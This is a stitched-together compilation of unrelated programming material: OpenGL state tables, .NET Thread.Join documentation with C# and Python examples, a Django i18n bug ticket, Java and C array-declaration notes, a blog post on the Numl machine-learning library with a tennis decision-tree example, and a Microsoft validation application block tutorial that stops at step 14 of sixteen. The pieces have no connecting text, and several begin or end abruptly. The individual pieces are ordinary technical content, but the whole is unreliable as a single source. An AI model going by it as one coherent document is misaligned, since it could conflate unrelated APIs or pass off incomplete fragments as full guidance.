VERTEX_ATTRIB_ARRAY_ENABLED | 16+×B | GetVertexAttrib | False | Vertex attrib array enable | 2.8 | vertex-array
VERTEX_ATTRIB_ARRAY_SIZE | 16+×Z | GetVertexAttrib | 4 | Vertex attrib array size | 2.8 | vertex-array
VERTEX_ATTRIB_ARRAY_STRIDE | 16+×Z+ | GetVertexAttrib | 0 | Vertex attrib array stride | 2.8 | vertex-array
VERTEX_ATTRIB_ARRAY_TYPE | 16+×Z4 | GetVertexAttrib | FLOAT | Vertex attrib array type | 2.8 | vertex-array
VERTEX_ATTRIB_ARRAY_NORMALIZED | 16+×B | GetVertexAttrib | False | Vertex attrib array normalized | 2.8 | vertex-array
VERTEX_ATTRIB_ARRAY_POINTER | 16+×P | GetVertexAttribPointerv | NULL | Vertex attrib array pointer | 2.8 | vertex-array
NORMAL_ARRAY_BUFFER_BINDING | Z+ | GetIntegerv | 0 | Normal array buffer binding | 2.9 | vertex-array
COLOR_ARRAY_BUFFER_BINDING | Z+ | GetIntegerv | 0 | Color array buffer binding | 2.9 | vertex-array
INDEX_ARRAY_BUFFER_BINDING | Z+ | GetIntegerv | 0 | Index array buffer binding | 2.9 | vertex-array
TEXTURE_COORD_ARRAY_BUFFER_BINDING | 2*×Z+ | GetIntegerv | 0 | Texcoord array buffer binding | 2.9 | vertex-array
EDGE_FLAG_ARRAY_BUFFER_BINDING | Z+ | GetIntegerv | 0 | Edge flag array buffer binding | 2.9 | vertex-array
SECONDARY_COLOR_ARRAY_BUFFER_BINDING | Z+ | GetIntegerv | 0 | Secondary color array buffer binding | 2.9 | vertex-array

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
– | n×BMU | GetBufferSubData | – | Buffer data | 2.9 | –
BUFFER_SIZE | n×Z+ | GetBufferParameteriv | 0 | Buffer data size | 2.9 | –
BUFFER_USAGE | n×Z9 | GetBufferParameteriv | STATIC_DRAW | Buffer usage pattern | 2.9 | –
BUFFER_ACCESS | n×Z3 | GetBufferParameteriv | READ_WRITE | Buffer access flag | 2.9 | –
BUFFER_MAPPED | n×B | GetBufferParameteriv | FALSE | Buffer map flag | 2.9 | –
BUFFER_MAP_POINTER | n×Y | GetBufferPointerv | NULL | Mapped buffer pointer | 2.9 | –
VIEWPORT | 4×Z | GetIntegerv | see 2.11.1 | Viewport origin & extent | 2.11.1 | viewport
DEPTH_RANGE | 2×R+ | GetFloatv | 0,1 | Depth range near & far | 2.11.1 | viewport
COLOR_MATRIX_STACK_DEPTH | Z+ | GetIntegerv | 1 | Color matrix stack pointer | 3.6.3 | –
MODELVIEW_STACK_DEPTH | Z+ | GetIntegerv | 1 | Model-view matrix stack pointer | 2.11.2 | –
PROJECTION_STACK_DEPTH | Z+ | GetIntegerv | 1 | Projection matrix stack pointer | 2.11.2 | –
TEXTURE_STACK_DEPTH | 2*×Z+ | GetIntegerv | 1 | Texture matrix stack pointer | 2.11.2 | –

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
FOG_COLOR | C | GetFloatv | 0,0,0,0 | Fog color | 3.10 | fog
FOG_INDEX | CI | GetFloatv | 0 | Fog index | 3.10 | fog
FOG_DENSITY | R | GetFloatv | 1.0 | Exponential fog density | 3.10 | fog
FOG_START | R | GetFloatv | 0.0 | Linear fog start | 3.10 | fog
FOG_END | R | GetFloatv | 1.0 | Linear fog end | 3.10 | fog
FOG_MODE | Z3 | GetIntegerv | EXP | Fog mode | 3.10 | fog
FOG | B | IsEnabled | False | True if fog enabled | 3.10 | fog/enable
FOG_COORD_SRC | Z2 | GetIntegerv | FRAGMENT_DEPTH | Source of coordinate for fog | 3.10 | fog
COLOR_MATERIAL_PARAMETER | Z5 | GetIntegerv | AMBIENT_AND_DIFFUSE | Material properties tracking current color | 2.14.3 | lighting
COLOR_MATERIAL_FACE | Z3 | GetIntegerv | FRONT_AND_BACK | Face(s) affected by color tracking | 2.14.3 | lighting
AMBIENT | 2×C | GetMaterialfv | (0.2,0.2,0.2,1.0) | Ambient material color | 2.14.1 | lighting
DIFFUSE | 2×C | GetMaterialfv | (0.8,0.8,0.8,1.0) | Diffuse material color | 2.14.1 | lighting
SPECULAR | 2×C | GetMaterialfv | (0.0,0.0,0.0,1.0) | Specular material color | 2.14.1 | lighting
EMISSION | 2×C | GetMaterialfv | (0.0,0.0,0.0,1.0) | Emissive material color | 2.14.1 | lighting

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
AMBIENT | 8*×C | GetLightfv | (0.0,0.0,0.0,1.0) | Ambient intensity of light i | 2.14.1 | lighting
DIFFUSE | 8*×C | GetLightfv | see table 2.10 | Diffuse intensity of light i | 2.14.1 | lighting
SPECULAR | 8*×C | GetLightfv | see table 2.10 | Specular intensity of light i | 2.14.1 | lighting
POSITION | 8*×P | GetLightfv | (0.0,0.0,1.0,0.0) | Position of light i | 2.14.1 | lighting
CONSTANT_ATTENUATION | 8*×R+ | GetLightfv | 1.0 | Constant attenuation factor | 2.14.1 | lighting
LINEAR_ATTENUATION | 8*×R+ | GetLightfv | 0.0 | Linear attenuation factor | 2.14.1 | lighting
QUADRATIC_ATTENUATION | 8*×R+ | GetLightfv | 0.0 | Quadratic attenuation factor | 2.14.1 | lighting
SPOT_DIRECTION | 8*×D | GetLightfv | (0.0,0.0,-1.0) | Spotlight direction of light i | 2.14.1 | lighting
SPOT_EXPONENT | 8*×R+ | GetLightfv | 0.0 | Spotlight exponent of light i | 2.14.1 | lighting
SPOT_CUTOFF | 8*×R+ | GetLightfv | 180.0 | Spotlight angle of light i | 2.14.1 | lighting
LIGHTi | 8*×B | IsEnabled | False | True if light i enabled | 2.14.1 | lighting/enable

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
POLYGON_OFFSET_FILL | B | IsEnabled | False | Polygon offset enable for FILL mode rasterization | 3.5.5 | polygon/enable
– | I | GetPolygonStipple | 1's | Polygon stipple | 3.5 | polygon-stipple
POLYGON_STIPPLE | B | IsEnabled | False | Polygon stipple enable | 3.5.2 | polygon/enable

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
MULTISAMPLE | B | IsEnabled | True | Multisample rasterization | 3.2.1 | multisample/enable
SAMPLE_ALPHA_TO_COVERAGE | B | IsEnabled | False | Modify coverage from alpha | 4.1.3 | multisample/enable
SAMPLE_ALPHA_TO_ONE | B | IsEnabled | False | Set alpha to maximum | 4.1.3 | multisample/enable
SAMPLE_COVERAGE | B | IsEnabled | False | Mask to modify coverage | 4.1.3 | multisample/enable
SAMPLE_COVERAGE_VALUE | R+ | GetFloatv | 1 | Coverage mask value | 4.1.3 | multisample
SAMPLE_COVERAGE_INVERT | B | GetBooleanv | False | Invert coverage mask value | 4.1.3 | multisample

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
TEXTURE_xD | 2*×3×B | IsEnabled | False | True if xD texturing is enabled | 3.8 | texture/enable
TEXTURE_BINDING_xD | 2*×3×Z+ | GetIntegerv | 0 | Texture object bound to TEXTURE_xD | 3.8.12 | texture
TEXTURE_BINDING_CUBE_MAP | 2*×Z+ | GetIntegerv | 0 | Texture object bound to TEXTURE_CUBE_MAP | 3.8.11 | texture
TEXTURE_xD | n×I | GetTexImage | see 3.8 | xD texture image at l.o.d. i | 3.8 | –
TEXTURE_CUBE_MAP_POSITIVE_X | n×I | GetTexImage | see 3.8.1 | +x face cube map texture image at l.o.d. i | 3.8.1 | –
TEXTURE_CUBE_MAP_NEGATIVE_X | n×I | GetTexImage | see 3.8.1 | −x face cube map texture image at l.o.d. i | 3.8.1 | –
TEXTURE_CUBE_MAP_POSITIVE_Y | n×I | GetTexImage | see 3.8.1 | +y face cube map texture image at l.o.d. i | 3.8.1 | –
Table 6.16. Textures (state per texture unit and binding point)

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
RGB_SCALE | 2*×R3 | GetTexEnvfv | 1.0 | RGB post-combiner scaling | 3.8.13 | texture
ALPHA_SCALE | 2*×R3 | GetTexEnvfv | 1.0 | Alpha post-combiner scaling | 3.8.13 | texture

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
SCISSOR_TEST | B | IsEnabled | False | Scissoring enabled | 4.1.2 | scissor/enable
SCISSOR_BOX | 4×Z | GetIntegerv | see 4.1.2 | Scissor box | 4.1.2 | scissor
ALPHA_TEST | B | IsEnabled | False | Alpha test enabled | 4.1.4 | color-buffer/enable
ALPHA_TEST_FUNC | Z8 | GetIntegerv | ALWAYS | Alpha test function | 4.1.4 | color-buffer
ALPHA_TEST_REF | R+ | GetIntegerv | 0 | Alpha test reference value | 4.1.4 | color-buffer
STENCIL_TEST | B | IsEnabled | False | Stenciling enabled | 4.1.5 | stencil-buffer/enable
STENCIL_FUNC | Z8 | GetIntegerv | ALWAYS | Front stencil function | 4.1.5 | stencil-buffer
STENCIL_VALUE_MASK | Z+ | GetIntegerv | 1's | Front stencil mask | 4.1.5 | stencil-buffer
STENCIL_REF | Z+ | GetIntegerv | 0 | Front stencil reference value | 4.1.5 | stencil-buffer
STENCIL_FAIL | Z8 | GetIntegerv | KEEP | Front stencil fail action | 4.1.5 | stencil-buffer
STENCIL_PASS_DEPTH_FAIL | Z8 | GetIntegerv | KEEP | Front stencil depth buffer fail action | 4.1.5 | stencil-buffer
STENCIL_PASS_DEPTH_PASS | Z8 | GetIntegerv | KEEP | Front stencil depth buffer pass action | 4.1.5 | stencil-buffer
STENCIL_BACK_FUNC | Z8 | GetIntegerv | ALWAYS | Back stencil function | 4.1.5 | stencil-buffer
STENCIL_BACK_VALUE_MASK | Z+ | GetIntegerv | 1's | Back stencil mask | 4.1.5 | stencil-buffer

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
BLEND | B | IsEnabled | False | Blending enabled | 4.1.8 | color-buffer/enable
BLEND_SRC_RGB (v1.3: BLEND_SRC) | Z15 | GetIntegerv | ONE | Blending source RGB function | 4.1.8 | color-buffer
BLEND_SRC_ALPHA | Z15 | GetIntegerv | ONE | Blending source A function | 4.1.8 | color-buffer
BLEND_DST_RGB (v1.3: BLEND_DST) | Z14 | GetIntegerv | ZERO | Blending dest. RGB function | 4.1.8 | color-buffer
BLEND_DST_ALPHA | Z14 | GetIntegerv | ZERO | Blending dest. A function | 4.1.8 | color-buffer
BLEND_EQUATION_RGB (v1.5: BLEND_EQUATION) | Z5 | GetIntegerv | FUNC_ADD | RGB blending equation | 4.1.8 | color-buffer
BLEND_EQUATION_ALPHA | Z5 | GetIntegerv | FUNC_ADD | Alpha blending equation | 4.1.8 | color-buffer
BLEND_COLOR | C | GetFloatv | 0,0,0,0 | Constant blend color | 4.1.8 | color-buffer
DRAW_BUFFERi | 1+×Z10* | GetIntegerv | see 4.2.1 | Draw buffer selected for output color i | 4.2.1 | color-buffer
DRAW_BUFFER | Z10* | GetIntegerv | see 4.2.1 | Draw buffer selected for output color 0 | 4.2.1 | color-buffer
INDEX_WRITEMASK | Z+ | GetIntegerv | 1's | Color index writemask | 4.2.2 | color-buffer
COLOR_WRITEMASK | 4×B | GetBooleanv | True | Color write enables; R, G, B, or A | 4.2.2 | color-buffer
DEPTH_WRITEMASK | B | GetBooleanv | True | Depth buffer enabled for writing | 4.2.2 | depth-buffer
STENCIL_WRITEMASK | Z+ | GetIntegerv | 1's | Front stencil buffer writemask | 4.2.2 | stencil-buffer
STENCIL_BACK_WRITEMASK | Z+ | GetIntegerv | 1's | Back stencil buffer writemask | 4.2.2 | stencil-buffer
COLOR_CLEAR_VALUE | C | GetFloatv | 0,0,0,0 | Color buffer clear value (RGBA mode) | 4.2.3 | color-buffer
INDEX_CLEAR_VALUE | CI | GetFloatv | 0 | Color buffer clear value (color index mode) | 4.2.3 | color-buffer

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
UNPACK_SWAP_BYTES | B | GetBooleanv | False | Value of UNPACK_SWAP_BYTES | 3.6.1 | pixel-store
UNPACK_LSB_FIRST | B | GetBooleanv | False | Value of UNPACK_LSB_FIRST | 3.6.1 | pixel-store
UNPACK_IMAGE_HEIGHT | Z+ | GetIntegerv | 0 | Value of UNPACK_IMAGE_HEIGHT | 3.6.1 | pixel-store
UNPACK_SKIP_IMAGES | Z+ | GetIntegerv | 0 | Value of UNPACK_SKIP_IMAGES | 3.6.1 | pixel-store
UNPACK_ROW_LENGTH | Z+ | GetIntegerv | 0 | Value of UNPACK_ROW_LENGTH | 3.6.1 | pixel-store
UNPACK_SKIP_ROWS | Z+ | GetIntegerv | 0 | Value of UNPACK_SKIP_ROWS | 3.6.1 | pixel-store
UNPACK_SKIP_PIXELS | Z+ | GetIntegerv | 0 | Value of UNPACK_SKIP_PIXELS | 3.6.1 | pixel-store
UNPACK_ALIGNMENT | Z+ | GetIntegerv | 4 | Value of UNPACK_ALIGNMENT | 3.6.1 | pixel-store
PACK_SWAP_BYTES | B | GetBooleanv | False | Value of PACK_SWAP_BYTES | 4.3.2 | pixel-store
PACK_LSB_FIRST | B | GetBooleanv | False | Value of PACK_LSB_FIRST | 4.3.2 | pixel-store
PACK_IMAGE_HEIGHT | Z+ | GetIntegerv | 0 | Value of PACK_IMAGE_HEIGHT | 4.3.2 | pixel-store
PACK_SKIP_IMAGES | Z+ | GetIntegerv | 0 | Value of PACK_SKIP_IMAGES | 4.3.2 | pixel-store
PACK_ROW_LENGTH | Z+ | GetIntegerv | 0 | Value of PACK_ROW_LENGTH | 4.3.2 | pixel-store
PACK_SKIP_ROWS | Z+ | GetIntegerv | 0 | Value of PACK_SKIP_ROWS | 4.3.2 | pixel-store
POST_COLOR_MATRIX_COLOR_TABLE | B | IsEnabled | False | True if post color matrix color table lookup is done | 3.6.3 | pixel/enable
COLOR_TABLE | I | GetColorTable | empty | Color table | 3.6.3 | –
POST_CONVOLUTION_COLOR_TABLE | I | GetColorTable | empty | Post convolution color table | 3.6.3 | –
POST_COLOR_MATRIX_COLOR_TABLE | I | GetColorTable | empty | Post color matrix color table | 3.6.3 | –
COLOR_TABLE_FORMAT | 2×3×Z42 | GetColorTableParameteriv | RGBA | Color tables' internal image format | 3.6.3 | –
COLOR_TABLE_WIDTH | 2×3×Z+ | GetColorTableParameteriv | 0 | Color tables' specified width | 3.6.3 | –

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
CONVOLUTION_1D | B | IsEnabled | False | True if 1D convolution is done | 3.6.3 | pixel/enable
CONVOLUTION_2D | B | IsEnabled | False | True if 2D convolution is done | 3.6.3 | pixel/enable
SEPARABLE_2D | B | IsEnabled | False | True if separable 2D convolution is done | 3.6.3 | pixel/enable
CONVOLUTION_xD | 2×I | GetConvolutionFilter | empty | Convolution filters; x is 1 or 2 | 3.6.3 | –
SEPARABLE_2D | 2×I | GetSeparableFilter | empty | Separable convolution filter | 3.6.3 | –
CONVOLUTION_BORDER_COLOR | 3×C | GetConvolutionParameterfv | 0,0,0,0 | Convolution border color | 3.6.5 | pixel
CONVOLUTION_BORDER_MODE | 3×Z4 | GetConvolutionParameteriv | REDUCE | Convolution border mode | 3.6.5 | pixel
CONVOLUTION_FILTER_SCALE | 3×R4 | GetConvolutionParameterfv | 1,1,1,1 | Scale factors applied to convolution filter entries | 3.6.3 | pixel
Thread.Join Method

Blocks the calling thread until the thread represented by this instance terminates, while continuing to perform standard COM and SendMessage pumping.

Assembly: mscorlib (in mscorlib.dll)

In the following example, the Thread1 thread calls the Join() method of Thread2, which causes Thread1 to block until Thread2 has completed.

using System;
using System.Threading;

public class Example
{
    static Thread thread1, thread2;

    public static void Main()
    {
        thread1 = new Thread(ThreadProc);
        thread1.Name = "Thread1";
        thread1.Start();

        thread2 = new Thread(ThreadProc);
        thread2.Name = "Thread2";
        thread2.Start();
    }

    private static void ThreadProc()
    {
        Console.WriteLine("\nCurrent thread: {0}", Thread.CurrentThread.Name);
        if (Thread.CurrentThread.Name == "Thread1" &&
            thread2.ThreadState != ThreadState.Unstarted)
            thread2.Join();

        Thread.Sleep(4000);
        Console.WriteLine("\nCurrent thread: {0}", Thread.CurrentThread.Name);
        Console.WriteLine("Thread1: {0}", thread1.ThreadState);
        Console.WriteLine("Thread2: {0}\n", thread2.ThreadState);
    }
}
// The example displays output like the following:
//    Current thread: Thread1
//
//    Current thread: Thread2
//
//    Current thread: Thread2
//    Thread1: WaitSleepJoin
//    Thread2: Running
//
//
//    Current thread: Thread1
//    Thread1: Running
//    Thread2: Stopped

If the thread has already terminated when Join is called, the method returns immediately. This method changes the state of the calling thread to include ThreadState.WaitSleepJoin. You cannot invoke Join on a thread that is in the ThreadState.Unstarted state.

Version information: .NET Framework — available since 1.1; Silverlight — available since 2.0; Windows Phone Silverlight — available since 7.0.
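The same blocking behavior exists in other runtimes. For comparison, a Python sketch of the pattern in the C# example above (join blocks the caller until the target thread finishes, which guarantees the completion order):

```python
import threading
import time

results = []

def worker(name, delay):
    # Simulates Thread2's work; appends its name when done.
    time.sleep(delay)
    results.append(name)

t2 = threading.Thread(target=worker, args=("Thread2", 0.2))
t2.start()

def thread1_proc():
    t2.join()                  # blocks Thread1 until Thread2 terminates
    results.append("Thread1")

t1 = threading.Thread(target=thread1_proc)
t1.start()
t1.join()

assert results == ["Thread2", "Thread1"]   # join guarantees this ordering
assert not t2.is_alive()                   # the joined thread has terminated
```

As in the .NET version, calling join on an already-terminated thread returns immediately.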
Opened 9 years ago
Closed 9 years ago
Last modified 9 years ago

#3877 closed (duplicate)

Newforms and i18n bug

Description

Here is how I define a form in my views:

class MyForm(forms.Form):
    name = forms.CharField(label=_('Name'))
    ...

The problem is that _('Name') is translated when I restart the server (Django or Apache), but not when I switch the browser locale. I tried both

from django.utils.translation import gettext_lazy as _

and

from django.utils.translation import gettext as _

Change History (2)

comment:1 Changed 9 years ago by

comment:2 Changed 9 years ago by

Thanks. I thought this was already reported somewhere, but I couldn't find it. Duplicate: #3600
https://code.djangoproject.com/ticket/3877
Array Declaration in Java and C

In Java, an array variable is declared the same way as any other variable: it has a type and a valid Java identifier. The declaration itself does not allocate the array; it only states that the variable will hold an array of the given element type, for example int[] anArray;. An array is a fixed-size allocation that holds a set number of values of the same type; its size (length) is fixed when the array is constructed. Multidimensional arrays are arrays of arrays.

In C, declaring an array is similar: you specify the name of the data type, the array name, and the number of elements.

The same ideas appear in the related pages: JSP declaration tags let you declare variables and methods (each declaration must be valid Java and end with a semicolon), JavaScript supports array declaration in scripts, and PHP 5.3.0 introduced namespaces, which are collections of classes, objects, and functions used to avoid naming collisions between classes.

Related exercise: write and test a function named mirror that is passed an array of n floats and returns a newly created array that contains those n floats in reverse order, e.g. turning the array {10.1, 11.2, 8.3, 7.5, 22} into {22, 7.5, 8.3, 11.2, 10.1}.

Comments:
- Hritish Choudhary (April 12, 2012 at 9:15 AM): How many ways are there to declare an array? Please explain, with appropriate C programming examples.
- Durgesh swarnkar (May 3, 2013 at 12:41 AM): Nice post.

Post your Comment
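As a concrete, runnable illustration of the declaration forms discussed above (the class name and values are arbitrary examples, not taken from the page):

```java
public class ArrayDeclaration {
    public static void main(String[] args) {
        // Declaration only: anArray refers to no array yet.
        int[] anArray;

        // Construction: a fixed-size array of 5 ints (length fixed here).
        anArray = new int[5];
        anArray[0] = 42;

        // Declaration + initialization in one step.
        int[] primes = {2, 3, 5, 7, 11};

        // A two-dimensional array: an array of arrays.
        int[][] grid = new int[2][3];

        System.out.println(anArray[0]);    // 42
        System.out.println(primes.length); // 5
        System.out.println(grid.length);   // 2
    }
}
```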
http://roseindia.net/discussion/23739-C-Array-Declaration.html
I came across a really good library recently called Numl. Numl is a .NET library that aims to make Machine Learning much more accessible to developers by abstracting away all the complex parts. What is Machine Learning, I hear you say? Broadly, it is the practice of getting computers to make predictions or decisions by learning from example data rather than by following explicitly programmed rules. Numl does this via two approaches: supervised and unsupervised learning.

Supervised learning is the part that I find most interesting and useful for my purposes. When using supervised learning you provide a labelled set of examples, and this can be provided as lists of objects, data tables, etc. These data sets contain examples of how decisions were made previously. This collection of objects is then converted into a matrix and a vector. The matrix columns represent each feature used to make decisions, while each row is a numerical representation of one object. The vector is a list of answers corresponding to each matrix row. The Descriptor object is a mapping between object properties and their corresponding numerical representation.

The computer then uses the previously generated data to train a model. The shape of the model depends entirely on the learning algorithm chosen: it can be a single vector, a tree, or even a collection of points. This model will then predict the target label given a new object of the same shape used during training.

Supervised Learning – Simple Example

Numl is very easy to set up in Visual Studio. The library is managed by NuGet, so from the NuGet console you just need to type:

Install-Package numl

I will quickly run through the simple example used on the Numl site. Obviously this is a very simplistic example, but it will give you a good idea of what to expect. In this example we want to determine whether, under certain weather conditions, it is ok to play a game of tennis. First let's look at some sample data. This is just static hard-coded data; normally you would use a larger data set from a database etc.
public enum Outlook { Sunny, Overcast, Rainy }
public enum Temperature { Low, High }

public class Tennis
{
    [Feature]
    public Outlook Outlook { get; set; }
    [Feature]
    public Temperature Temperature { get; set; }
    [Feature]
    public bool Windy { get; set; }
    [Label]
    public bool Play { get; set; }

    public static Tennis[] GetData()
    {
        return new Tennis[]
        {
            new Tennis { Play = true,  Outlook = Outlook.Sunny,    Temperature = Temperature.Low,  Windy = true },
            new Tennis { Play = false, Outlook = Outlook.Sunny,    Temperature = Temperature.High, Windy = true },
            new Tennis { Play = false, Outlook = Outlook.Sunny,    Temperature = Temperature.High, Windy = false },
            new Tennis { Play = true,  Outlook = Outlook.Overcast, Temperature = Temperature.Low,  Windy = true },
            new Tennis { Play = true,  Outlook = Outlook.Overcast, Temperature = Temperature.High, Windy = false },
            new Tennis { Play = true,  Outlook = Outlook.Overcast, Temperature = Temperature.Low,  Windy = false },
            new Tennis { Play = false, Outlook = Outlook.Rainy,    Temperature = Temperature.Low,  Windy = true },
            new Tennis { Play = true,  Outlook = Outlook.Rainy,    Temperature = Temperature.Low,  Windy = false }
        };
    }
}

In this example we have a Tennis class that contains some properties. Outlook, Temperature and Windy are data points that are used to train the model. The property called Play is the outcome, which in this case is whether to play a game of tennis or not. If we look at the first example in the GetData method, we will play a game of tennis if the outlook is sunny and the temperature is low, even though it is windy.

Once we have our test data we then need to train the model. This is done with only a few lines of code:

Tennis[] data = Tennis.GetData();
var d = Descriptor.Create<Tennis>();
var g = new DecisionTreeGenerator(d);
g.SetHint(false);
var model = Learner.Learn(data, 0.80, 1000, g);

In this case the Learner uses 80% of the data to train the model and 20% to test the model. The learner also runs the generator 1000 times and returns the most accurate model.
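Under the hood, Learner.Learn follows the classic train-then-predict split: a generator runs the (possibly expensive) learning algorithm once and emits a lightweight model object whose only job is to predict. The following pure-Python sketch mirrors that shape with a deliberately trivial majority-class "learner"; none of these names come from Numl, which is a .NET library.

```python
from collections import Counter

class MajorityClassGenerator:
    """Stands in for a generator: runs the (potentially expensive)
    learning algorithm once and produces a model object."""
    def generate(self, examples):
        # examples: list of (features, label) pairs
        labels = [label for _features, label in examples]
        majority = Counter(labels).most_common(1)[0][0]
        return MajorityClassModel(majority)

class MajorityClassModel:
    """Stands in for the paired model: cheap to call, only predicts."""
    def __init__(self, majority):
        self.majority = majority
    def predict(self, _features):
        return self.majority

data = [
    ({"windy": True},  True),
    ({"windy": False}, True),
    ({"windy": True},  False),
]
model = MajorityClassGenerator().generate(data)  # step 1: generator -> model
print(model.predict({"windy": True}))            # step 2: model -> prediction (True)
```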
Now that the model has been trained we can start to make predictions from it. In the example on the site, they check whether it is ok to play a game of tennis if the outlook is overcast, the temperature is low, and it is windy (note that the Temperature enum defined above only has Low and High values):

Tennis t = new Tennis
{
    Outlook = Outlook.Overcast,
    Temperature = Temperature.Low,
    Windy = true
};

model.Predict(t);

In this example the expected result is that Play will return true.

The process for using the supervised machine learning algorithms is primarily a two-step process. The first step is the instantiation of a Generator object; the generator object then produces the actual model. The actual supervised algorithms are executed in the generator object, and some of these are computationally expensive and take some time to complete. Each generator class is paired with a model that represents the output of the machine learning algorithm. Although these vary in size and functionality, their ultimate goal is to predict based upon the learned model.

Currently this library contains the following algorithms for supervised learning:

- Perceptron
- Kernelized Perceptron
- K Nearest Neighbors
- Decision Trees
- Naive Bayes
- Neural Networks

I think this library is fantastic and certainly has many uses. Numl makes what is normally a very complicated discipline a lot simpler to digest. Whilst the library is very easy to use, you will need to experiment with generating different kinds of models and testing the outcomes. The more data you can train the system with, the better.

Comments:

"You've got some &lt; and &gt; strings in there in the code."

"Thanks. I will take a look." "Fixed."

"I have occasionally seen articles about particular machine learning algorithms, which can typically be summed up as 'okay so you define a bunch of input neurons, hidden neurons and output neurons and now you've got an AI!
Congratulations!” and I am left with the distinct impression they forgot to tell me something important, like how to wire up the neurons or why they work the way they do… What I have not seen yet out on the web is an explanation of how to select a machine-learning algorithm based on the nature of the input data and the desired outcome. I also have not seen a guidebook for figuring out what kinds of things are best solved with machine learning versus what kinds of things are best solved by traditional algorithms and heuristics. As an experienced non-AI programmer, every problem to me looks like it should be solved with an algorithm. Using AI simply does not occur to me. Personally I’m interested in natural language processing. I wonder where NLP and AI intersect. I know I should just go back to university for it, but my local uni has no experts in NLP. *rambling detected. killing process.*
https://stephenhaunts.com/2014/08/15/machine-learning-with-numl/
Validation is one of the most important parts of any software project, and building flexible business validation is every developer's dream. Rather than writing frameworks from scratch to do these things, the Microsoft validation application block makes it a breeze. In this article we will discuss how the validation application block helps us build flexible validations. It's just a simple sixteen-step process to put our business validation in action using validation blocks.

UIP block: this article talks about reusable navigation and workflow for both Windows and Web using Microsoft UIP blocks.

No business can work without validation. Software is made to automate business, so validation forms a core aspect of any software. Almost 80% of .NET projects implement validation, as shown in the figure below.

Figure: - Validation implemented

The above figure shows how business validations are implemented for a simple customer class. We have two properties, customer code and customer name, both of which are compulsory. So we have created a class called 'ClsCustomer' with two set/get properties for customer code and customer name. If we find that customer code is empty in the setter of the property, we raise an error. We use the same methodology for customer name. Now we can consume the class in the ASPX UI as shown in figure 'Business object consumed'. We have created the object, set the properties, and in case there is an error we have caught it and displayed it in a label using try/catch exception blocks.

Figure: - Business object consumed

This implementation looks good to some extent, as we have put the business validation in the class and decoupled the UI from business validation changes. Let's list the common problems associated with the above methodology:

Tangled validation: if the validation rules change, we need to compile the whole class.
As the entity and the validation layer are entangled in one class, changes in validation lead to compilation of the whole class. So our first goal should be to decouple this validation logic from the entity class. When we say entity class we are referring to the 'ClsCustomer' class.

Figure: - Tangled validation

Figure: - Decoupling validations from the entity class

No need of compiling: validations are volatile; they change from time to time. Being able to change validation constraints without compiling leads to better maintenance of the system.

One-go validation and results: the second issue is that validations are executed in every property setter and errors are displayed one by one. It would be great if we could run all the validations once and display all the errors at once.

All these things can be achieved by using Microsoft validation application blocks.

Step 1:- Download the Enterprise Library 4.0 from here.

Step 2:- Once you install it you should see the same in Programs - Microsoft patterns and practices. Before we move ahead, let's first walk through how the validation application block decouples the validation from the entity classes. The validation application block stands between the entity class and the validation rules. Validations are stored in configuration files like web.config or app.config, depending on whether it's a web application or a windows application. The validation block reads the rules from the configuration file and applies them over the entity class. We can maintain these validations using the enterprise configuration screen provided by Microsoft blocks.

Figure: - Decoupling validations from entity classes

Now that we understand how the validation block works, we will run through an example to understand the concept practically.
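As a conceptual warm-up before the Enterprise Library steps, here is a hypothetical, framework-free Python sketch of the three goals above (the rule format here is invented and is not the Enterprise Library's): the rules live in a data structure that could be loaded from a config file, the entity class knows nothing about them, and validation runs in one pass and returns every failure at once.

```python
class Customer:
    # Plain entity: no validation logic tangled in.
    def __init__(self, code="", name=""):
        self.code = code
        self.name = name

# In a real system this dict could be deserialized from web.config/app.config,
# so rules change without recompiling the entity.
RULES = {
    "code": {"min_length": 1, "message": "Customer code is compulsory"},
    "name": {"min_length": 1, "message": "Customer name is compulsory"},
}

def validate(entity, rules):
    """Validate in one go; collect ALL failures instead of raising on the first."""
    errors = []
    for field, rule in rules.items():
        value = getattr(entity, field, "")
        if len(value) < rule["min_length"]:
            errors.append(rule["message"])
    return errors

print(validate(Customer(), RULES))
# ['Customer code is compulsory', 'Customer name is compulsory']
```

Returning the full error list mirrors the ValidationResults collection used later in the article, as opposed to the throw-on-first-error setters shown at the start.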
Step 3:- Once you have installed the block, click on the Enterprise Library configuration UI to define validation in the configuration file.

Figure: - Loading Enterprise configuration screen

Step 4:- Click on open, browse to your web.config file, and click the open button.

Figure: - Open the web.config file

Step 5:- Once you have opened the web.config file you should see a tree-like structure as shown in figure 'Add validation block'. Right-click on the main tree and add the validation application block to your web.config file.

Figure: - Add validation application block

Step 6:- Once you have added the validation application block you should see a validation application block node. Right-click on the node, select New, and click the Type menu.

Figure: - Add the assembly type

Step 7:- Once you have clicked on the Type menu you should see a dialog box as shown in figure 'Load assembly'.

Figure: - Load assembly

Step 8:- Click on load assembly and browse to the assembly DLL to which you want to apply validations.

Figure: - Browse the assembly

Step 9:- Select the class in the assembly as shown in figure 'Select class'.

Figure: - Select class

Step 10:- Once you have loaded the assembly, you should see a new node 'MyRules' as shown in figure 'Choose members'. Right-click on 'MyRules', select New, and choose Members.

Figure: - Choose members

Step 11:- Once you have clicked the Choose Members menu, a property selector box will pop up as shown in figure 'Select properties'. In the customer class we have two properties on which we want to apply validations: customer name and customer code. So we will select both properties and click OK.

Figure: - Choose properties

Step 12:- Once you have selected the properties you can see both of them in the UI. To apply validation, right-click on, say, the customer code property. You will now see a list of validations which you can apply to the property.
This tutorial will not go into detail about all the validations. If you are interested, you can read about them in more detail on . For the current scenario we will select the range validator.

Figure: - Select range validator

Step 13:- Once you have selected the range validator, you will see the property box below for range validators. In this scenario we require that both properties, customer code and customer name, are not empty. So in the lower bound we put 1, which signifies that at least one character is needed. For the lower bound type we have selected Inclusive, which means the lower bound check is compulsory. In the message template, put the error message which you want to display in case there are issues.

Figure: - Range validator properties

Step 14:- In the default rule, select the rule which you have just made. If it is set to None, validations will not fire.

Figure: - Select rule

